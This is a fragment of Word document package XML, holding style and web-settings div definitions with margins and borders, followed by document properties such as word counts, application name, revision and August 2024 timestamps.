  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00BF5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74772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="347147484">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1214922199">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="880677267">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1719431437">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1796362594">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1923366582">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="450"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="19066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562</Words>
  <Characters>3339</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>98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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-28T23:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-29T01:56:00Z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0e2ddf27a7798cb1a6e7bd5b400991196c302accbcf48cda635ecf160b68c2fb</vt:lpwstr>
  </property>
</Properties>
</file>